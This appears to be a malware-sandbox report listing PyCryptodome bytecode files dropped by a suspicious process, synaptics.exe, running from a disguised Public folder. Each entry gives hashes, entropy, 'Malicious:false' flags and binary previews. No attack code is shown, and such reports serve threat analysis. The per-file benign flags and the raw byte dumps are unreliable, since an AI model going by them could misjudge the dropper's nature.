                                                                                                                                                                                      Preview:o..........f.Y.......................@...s$...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z e.d.d...Z!d'd.d...Z"d(d.d...Z#G.d.d...d.e$..Z%d)d.d...Z&d*d.d...Z'd.d...Z(d.d...Z)d.d...Z*d+d d!..Z+d"d#..Z,d,d%d&..Z-d.S.)-.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):207
                                                                                                                                                                                      Entropy (8bit):5.118274351448721
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/ZlpQylud+Z/dZ6+4o+uaHxEM9ArM7BL9+:C362uAZ//6+4Tlh19+
                                                                                                                                                                                      MD5:C88B54D5F2CF87725D3BBD632636A3E2
                                                                                                                                                                                      SHA1:52A97A6BE18C581CE76F4651B049AF8569145309
                                                                                                                                                                                      SHA-256:DCEEAB8204DD17F8AAA367FC2FDA9536AC0A3D42FD8E4A62F3DA3D7C7F115F1F
                                                                                                                                                                                      SHA-512:9BE6B1EFC8F2A24CB202126631EEF7909B8F140B51217BAA427EE2067C041717C042EA5BCAB3A2EB6653201ACE253702584B00DA4D4153192FB39CAC8C04B57C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f1........................@...s....g.d...Z.d.S.).).Z.KDFZ.SecretSharingZ.DHN)...__all__..r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Protocol\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23799
                                                                                                                                                                                      Entropy (8bit):5.5436089399767585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Zh5ntLDIVVMEPHq5Bk2esJSEgEBNZU0VgwpPjpNRui1GwCO7NJZKY:ltwMES5m2nJoEdB/pPzPCO7XX
                                                                                                                                                                                      MD5:3CD17EFF54CFF19C11CF72DBA8AEAFAE
                                                                                                                                                                                      SHA1:55BDA90383639E9285839867AF0F40A71386D22A
                                                                                                                                                                                      SHA-256:38A754A99C2AB51128D32E409399D94DFC4073316E457984D591EF1FE98BD2B1
                                                                                                                                                                                      SHA-512:4AE870897BBF176F290E9081D4AB9A6F84635C18FEC2255B0937719D25633D53341E848D3ED413621C69D0E67FF2DD76D6B430F75EAC28D5A1BDE36299FA1F77
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.|.......................@...s....g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d#d.d...Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"d%d d!..Z#e#Z$d"Z%d.S.)&)...generate..construct..import_key..RsaKey..oid.....N)...Random)...tobytes..bord..tostr)...DerSequence..DerNull)...bytes_to_long)...Integer)...test_probable_prime..generate_probable_prime..COMPOSITE)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z..6.5dKd7d8..Z.d9d:..Z.d;d<..Z d=d>..Z!d?d@..Z"dAdB..Z#dCdD..Z$dEdF..Z%dGdH..Z&dIdJ..Z'd5S.)Lr....a....Class defining an
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                                      Entropy (8bit):5.396142590240559
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NwzSTw1WWXezNJeVvcsso0Gar/xCVf9SVY:lsk4UreRbsoiSx
                                                                                                                                                                                      MD5:1F068416EBC1509D06B7A922BCF00DED
                                                                                                                                                                                      SHA1:6109B9CF3A809D5BE23BA7EFA6175908AACBB2DC
                                                                                                                                                                                      SHA-256:2E0E46452A58696628FCDE095EE30E633F18EAC4DAB47717FFF6387E306AA3DF
                                                                                                                                                                                      SHA-512:E28274A318359A71EF35651570336CCCFA0E01F9DF649DFE9EB7EF6DF32879C3455B4716010798C267C230F0A00A40FB678F493E0029A14B3DF2838E37304EB0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s8...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.d...Z.d.d...Z.d.S.)......)...DerSequence..DerInteger..DerBitString..DerObjectId..DerNullc....................C...s....t...j.|.d.d...}.t...j.|.d...d.d...}.t.....|.d.....}.t.....|.d.....j.}.t.|...d.k.r,d.}.n.z.t.....|.d.......d.}.W.n.......|.d...}.Y.|.j.|.|.f.S.).z.Parse a SubjectPublicKeyInfo structure... It returns a triple with:. * OID (string). * encoded public key (bytes). * Algorithm parameters (bytes or None). .......Z.nr_elementsr....)......r....r....N).r......decoder....r......value..lenr....)...encoded..spkiZ.algo..algo_oidZ.spkZ.algo_params..r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\PublicKey\__init__.py.._expand_subject_public_key_info....s............................r....c....................C...s@...|.d.u.r.t.t.|...g...}.n.t.t.|...|.g...}.t.|.t.|...g...}.|.....S.).N).r....r....r......encode).r....Z.public_key..params..algorithmr....r....r....r...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1259
                                                                                                                                                                                      Entropy (8bit):4.6658059178113716
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NOtWRuX2i3FOd3krWhInkOCUqxUNRQj/jfhlHJ4fEByWkJwjGP4gE/:NZRHd02UEU9iDrtP6Af
                                                                                                                                                                                      MD5:1FCEF4642458B7B2AEC8F4EDD8769514
                                                                                                                                                                                      SHA1:8DFE507B35AA4B84A08E7797AC704334DC0A4B7D
                                                                                                                                                                                      SHA-256:64AC92C155F44292FC051885661E0F40B19EF0CA378D3D082F33F0D9EE07DA73
                                                                                                                                                                                      SHA-512:A67D8A79DAD11F2CBD0FD9B0FD17EA7C5AD83988DF77D5204876D554DD4F17F79D38C64541BB85DE69ADCC6A0388F62E91B4D52CD20DFF527160495FE5CFB2E0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fJ........................@...s<...d.d.g.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc....................@...s,...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._UrandomRNGc....................C...s....t.|...S.).z0Return a random byte string of the desired size.r....)...self..n..r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Random\__init__.py..read....s......z._UrandomRNG.readc....................C........d.S...z0Method provided for backward compatibility only.Nr......r....r....r....r......flush!..........z._UrandomRNG.flushc....................C...r....r....r....r....r....r....r......reinit%...r....z._UrandomRNG.reinitc....................C...r....r....r....r....r....r....r......close)...r....z._UrandomRNG.closeN)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........s..............r....c....................O...s....t...S.).zFReturn a file-like object that outputs cryptographi
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3396
                                                                                                                                                                                      Entropy (8bit):5.311015065875513
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Gk/Yq7x6J5PPcWgudGUJFp9YY3sjuhXNvLHf85jL:GWY5PP7gO8Y31hdvLH6
                                                                                                                                                                                      MD5:F4907389F0D7E69224178BCBE6D44A86
                                                                                                                                                                                      SHA1:3F80396CACE704CF061AA5CAE2BE955C86DC0707
                                                                                                                                                                                      SHA-256:633A3ED69A0F4FEEEEAF8E4D772228C55D0983FBC983C0E79C3AD91B83D67E20
                                                                                                                                                                                      SHA-512:40A3BD59EC2CBD8BA48D9875E5E261DBF83F0029C191C4CC5AC6A4684E36C9304720955B518A1E7C8C010D068CC3D13ADDF7620CD594C9DC80C7DAA74F0546E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sv...g.d...Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.S.).)...StrongRandom..getrandbits..randrange..randint..choice..shuffle..sample.....)...Random)...is_native_intc....................@...sF...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...sX...|.d.u.r.|.d.u.r.d.|._.d.S.|.d.u.r.|.d.u.r.|.|._.d.S.|.d.u.r(|.d.u.r(|.j.|._.d.S.t.d.....).Nz(Cannot specify both 'rng' and 'randfunc')..._randfunc..read..ValueError)...self..rng..randfunc..r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Random\random.py..__init__ ...s..................z.StrongRandom.__init__c....................C...s:...|.j.d.u.r.t.....j.|._.d.|.>.d...}.|.t.|...t.|.d.......@.S.).z%Return an integer with k random bits.N..........).r....r......newr......bytes_to_long..ceil_div).r......k..maskr....r....r....r....*...s............z.StrongRandom.getrandbitsc.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                      Entropy (8bit):5.3437569578586555
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/grG01/WlJnIsICA51dJyikQSKCUICAfeT37ZgAk+g8uaHxEM9ArMgA5762:CgrG09WllIVF1mikQ4NSDQ+g8VlhD762
                                                                                                                                                                                      MD5:2D5E2D2B48FE9EB87DF6FE46A4E68C58
                                                                                                                                                                                      SHA1:30E97612405568263B86BD0ACC67DAB72E72BF2D
                                                                                                                                                                                      SHA-256:3BE20F38526BB469263A59EE82DEF3D3351CEDD0D58425BBEB9E1559A3826CCF
                                                                                                                                                                                      SHA-512:00C2CC73F6EF8639140EDE48FC4EE39D12388EEA4CBB0ACF920B3322562D601B70C9578F87AA43CCD34CB2052242119CF15575E25132A80893F448863FBB6650
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.g.d...Z.d.S.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..).Z.PKCS1_v1_5Z.PKCS1_PSSZ.DSSZ.pkcs1_15Z.pssZ.eddsaN)...__doc__..__all__..r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Signature\__init__.py..<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10800
                                                                                                                                                                                      Entropy (8bit):5.325984156587778
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:G1XsDu4taLRgOBEsNXAYcURRFNlm32KFO6GaVRlpBlYa:G18CI+RgslADURRV/KPGaVZBea
                                                                                                                                                                                      MD5:F81D8D4FFACCF9EF1FA51E6CF5719783
                                                                                                                                                                                      SHA1:98B3AACD50DDFD7288A2E87DB652525A1B2F6356
                                                                                                                                                                                      SHA-256:5313A44318D3BE517B6F66C639A8A4A3CBB7B77EF9EB1D0F4998DB926D693B52
                                                                                                                                                                                      SHA-512:EA56E60AE1A602F20EFDC3278F622D3C4E93D2FADE7F12E90B406D9C361FC452573B4574AA870EDBE6893FEAEC1538EA23FD942D2FC6B4B2CB813947A46FD179
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.6.......................@...sz...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c....................C...s....|.|._.|.|._.|.|._.|.|._.d.S.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to. genera
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2336
                                                                                                                                                                                      Entropy (8bit):5.4417595091627735
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NSEbQJrnAeKJdRXlkNyiFsx3miW7WlxeKbNRT7ytqmcQg:bbQJDAeqzHo2W6re637wg
                                                                                                                                                                                      MD5:3706D32026C84A67F20EAA92C2C395AB
                                                                                                                                                                                      SHA1:EDBD660872BDB8BB54F86F94521A94B07D778A1E
                                                                                                                                                                                      SHA-256:51ABB579BC8B05AF83B5FFA799F8DE0B013B03F991673C53D8146DCE11454112
                                                                                                                                                                                      SHA-512:C8E16EBEEE79A8162288011421AFA5AED305F696E4382238A26CA692D918C295756BCF84204F8E0E10B85D8B764EB40C39AD6EF945F108351917B6A7B2571AD4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fE........................@...s(...d.d.g.Z.d.d.l.T.d.d.d...Z.d.d.d...Z.d.S.)...pad..unpad.....)...*..pkcs7c....................C...s....|.t.|...|.....}.|.d.k.r.t.|...|...}.|.|...S.|.d.k.r*t.d...|.d.....t.|.....}.|.|...S.|.d.k.r>t.d...t.d...|.d.......}.|.|...S.t.d.....).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. r......x923r...........iso7816......Unknown padding style)...len..bchr..ValueError).Z.data_to_pad..block_size..style..padding_len..padding..r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\Padding.pyr....'...s...............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                      Entropy (8bit):4.873031507150908
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NKUilE4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBlOh2/K:NFilbASgf++BcD4YaQVprGGBgR
                                                                                                                                                                                      MD5:A207A1F466802102025E63FBA5B0E502
                                                                                                                                                                                      SHA1:83C8865EEDF0EB6EAD6379476F122F31DB5D91EA
                                                                                                                                                                                      SHA-256:2B0E5521DB488A45EE693FE27BDDB0184501FA891F7F5E0F99F0E59D6FD2EBBF
                                                                                                                                                                                      SHA-512:BB20B789CC9276E71C7011DAC39A982B5838A5EF40930CCA0E66B4CD6DDA9BB41A8EDE16D4871B56940BC5B7C6707E3EEF5C3FBB0B644F0A4FCC28849AB1FCDB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.).Z.RFC1751..numberZ.strxorZ.asn1..CounterZ.PaddingN)...__doc__..__all__
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):694
                                                                                                                                                                                      Entropy (8bit):4.5930397087553985
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Cg/Q4UlabXgAin19S07ov8Vlh2mv99J+di+ymIm+l:NTUliQAin19SkXh2+J+dBIL
                                                                                                                                                                                      MD5:2FFB368FB1F4936753669BC58C1D2F11
                                                                                                                                                                                      SHA1:E41F8637159EDF678354AD635978BF7EB7B7B21A
                                                                                                                                                                                      SHA-256:175F5DF25BEAB5CDE0EEB6AF705B0F991C3BF243FECCF63B9051A6B5C1D405F7
                                                                                                                                                                                      SHA-512:2B30C91B8B9E7DAAAF30804A9C8E1547F5CD9FC0CF21CD1817C333C224C9C52FB423C7C7CAA5B5D25AD9325870A314E4ACC9A6B14C506C665F772E5F63D91B66
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s*...d.d.l.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c....................C........t.....S...N)..._raw_cpuid_lib..have_aes_ni..r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\_cpu_features.pyr....)..........r....c....................C...r....r....).r......have_clmulr....r....r....r....r....-...r....r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r....r......<module>....s................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):853
                                                                                                                                                                                      Entropy (8bit):5.333276165807784
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NrLuapeA2HBZ8SlwC8ES3OyHzIh28M/3k:NrLu4YZkCkeyHzk8/0
                                                                                                                                                                                      MD5:FFF6EC453349F44DAD87C1FAC87687D5
                                                                                                                                                                                      SHA1:E2EA2906CDCF67A353F0B707036846B6EBB36AAE
                                                                                                                                                                                      SHA-256:8AEBC720460E9386513C4077B960EDF54EB151CB0683F106D7029F9B6315F5E1
                                                                                                                                                                                      SHA-512:A6228767611F37DF3B62CD375E3DCA2A2F7B4DE3760F14CAC27BF2AD5C48B8ABDA1DF54AFA950375D5CD14051CDF6054E00CA130FA4F98D24C9D84A97823A85B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.l.Z.d.d...Z.d.S.)......Nc....................C...sd...|.d...d.k.r.t.d.....t.|.d.d.......|.g...}.t.j...t.j...t.....\.}.}.t.j...|.d...}.t.j.j.|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r....Z.Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filenameZ.util_lib.._Z.root_lib..r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\_file_system.py..pycryptodome_filename"...s................r....).r....r....r....r....r....r......<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8730
                                                                                                                                                                                      Entropy (8bit):5.205858648047069
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:mfhLSEONC31/QtcU4/GPCenzp7Qb+RQrBIQIu7XNNHD0yXNvjB2IatSxB/dbJg1d:MhmEONC31ItcUGGPCenzp7Qb+RQrBIQO
                                                                                                                                                                                      MD5:6B937059E98D26DC3EAF077D6294913D
                                                                                                                                                                                      SHA1:1AFC6C5E8D9CB617D705578DC823B082B0232B54
                                                                                                                                                                                      SHA-256:90AE5500B3386456BAC3DB43961FB00E24C22AAD133C268486CDB069CC7915F7
                                                                                                                                                                                      SHA-512:7EA086DA739F93EFF55DA25D9A49321A78BA4375E3F425F2F98C3FCBF40F7EFE5E29AEF3C895E37BB0FFC1830100E781DA1A8940C5459CAE7FA3147C3460E4F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f}*.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.d...d.k.r:d.d.l.Z.g.Z.e.....D.].\.Z.Z.Z.e.e.j.k.r8e...e.....q)n.d.d.l.m.Z...e.j.Z.e.e.f.Z.G.d.d...d.e...Z.zkd.e.j.v.r_e.j.j.d.k.r_e.d.....e.j.d.k.rme.j.d.k.rme.d.....d.d.l.m.Z...e...Z.e.j Z!e.."e..#d.....Z$e..#d...j%j&Z'd.d...Z(d.d...Z)e)Z*e)Z+e)Z,d.d...Z-d;d.d...Z.d.d...Z/d.d...Z0d.d...Z1G.d.d ..d e...Z2d!d"..Z3d#Z4W.nt..e...y.......d.d.l5Z5d.d$l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d%l9m:Z:..d.d&l5m;Z'..d.Z!g.Z<d'd(..Z,d)d...Z(d*d...Z/d+d...Z0e5j=Z>d.Z?e5j@jAZBe5j@jCZDe5jEZFe5.Ge>..ZHG.d,d-..d-e5jI..ZJd.d...Z1G.d/d0..d0e...ZKd1d"..Z3d2Z4Y.n.w.G.d3d4..d4e...ZLd5d6..ZMd7d8..ZNd9d:..ZOd.S.)<.....N)...byte_string)...pycryptodome_filename.....)...machineryc....................@...s(...e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.d.S.)..._VoidPointerc....................C........d.S.).z&Return the memory location we point toN......selfr....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30875
                                                                                                                                                                                      Entropy (8bit):5.22335411670978
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:HzjEnqf1DECvkHf9R3OPtm6q3YZHjSgfShUUEV6:Hz8CIRePYN3YZHeDzEV6
                                                                                                                                                                                      MD5:09E29690A49BBC4501A083E339F5085E
                                                                                                                                                                                      SHA1:43E6AC799FB5644120E1616246B270ECFB30488C
                                                                                                                                                                                      SHA-256:062C8AE410CD6E62A4B6B64B4D4C98CEDAE873A5936BBFEFC8F334FF1C1AA88C
                                                                                                                                                                                      SHA-512:95964F50C25D97A73623682350191EC8437283E2BD98B1A52D441D81E885998812FDD4E7821D2B43565837D7656F62F25E68FCF61474A50182906A6558B5F5F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fq........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfFc....................C...s4...d.}.z.|.|...}.W.n...t.y.......Y.d.S.w.|...p.|.d.k.S.).Nr....F)...TypeError)...x..only_non_negative..test..r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\asn1.py.._is_number(...s..................r....c....................@...s@...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BytesIO_EOFzeThis class differs from BytesIO in that a ValueError exception is. raised whenever EOF is reached.c....................C...s....|.|._.d.|._.d.|._.d.S...Nr....)..._buffer.._index.._bookm
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61128
                                                                                                                                                                                      Entropy (8bit):5.246774965664733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:y5hCN5kZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXV:y5QkpyUy0lsEgZOtg78sI6VTLQ5DRvv6
                                                                                                                                                                                      MD5:9839C8CACA1D0C528CE4A356AE03454D
                                                                                                                                                                                      SHA1:DA30A521EBBEB4469D0DEE89802E180839B02192
                                                                                                                                                                                      SHA-256:AC302F77B19E805AA88C8D6B158CA88821547D01F190B91FA118B4D1981B74BA
                                                                                                                                                                                      SHA-512:1A5B185BB64AECAC92DB362FCD9B07352DDDB569F577F30CA34CEBFFE165BD8BF02589704B464F0008B5D6527D8D6CD5DBE5E5A1AB3C9F203B86A075880C45A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fh~.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.d(d.d...Z.d(d.d...Z.d(d.d...Z.e.j.d.d.....d.k.r>e.j.Z.n.d.d...Z.e.j.d.d.....d.k.rPd.d...Z.n.d.d...Z.d(d.d...Z.d(d.d...Z.d)d.d...Z.d*d.d...Z.d.d.l.Z.d+d.d ..Z.d!d"..Z.d.d.l.Z.d+d#d$..Z.d%d&..Z.d'Z.d.S.),.....N)...Random)...iter_rangec....................C...sP...|.d.k.r.t.....|.d.k.s.|.d.k.r.t.d.....t.|.|...\.}.}.|.d.k.r&|.d.k.r&|.d.7.}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..q..r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\number.py..ceil_div%...s....................r....c....................C...s....|.d.k.r.t.d.....|.....S.).z)Returns the size of the number N in bits.r....z4Size in bits only available for non-negative numbers).r......bit_length)...Nr....r....r......size2...s..........r....c....................C...sZ...|.d.u.r.t.j.}.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5247
                                                                                                                                                                                      Entropy (8bit):4.923935118860882
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ZcF/EpktYDLOjIWTmpSaRBF7mgcsi/e/7/9whOJZg+6B6cGZ2B+uWc7xUK6It:ZW/EpkGUIW82bWzL0zJU+
                                                                                                                                                                                      MD5:F7D90110B80B565EDEE6BF8F2C44D21F
